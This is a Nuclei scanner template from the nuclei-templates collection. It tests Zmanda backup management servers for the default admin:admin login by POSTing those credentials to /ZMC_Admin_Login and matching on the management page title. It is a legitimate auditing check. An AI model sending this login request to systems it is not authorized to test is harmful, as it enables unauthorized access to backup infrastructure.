nuclei-templates/default-logins/zmanda/zmanda-default-credential.yaml

30 lines
702 B
YAML

id: zmanda-default-credential
info:
name: Zmanda Default Credentials
author: Techryptic (@Tech)
severity: high
description: Default Credentials of admin:admin on Zmanda application.
reference: https://www.zmanda.com
tags: zmanda,default-login
requests:
- method: POST
path:
- '{{BaseURL}}/ZMC_Admin_Login'
headers:
Content-Type: application/x-www-form-urlencoded
Cookie: zmc_cookies_enabled=true
body: login=AEE&last_page=&username=admin&password=admin&submit=Login&JS_SWITCH=JS_ON
matchers-condition: and
matchers:
- type: word
words:
- "ZMC - Backup Set Management"
- type: status
status:
- 200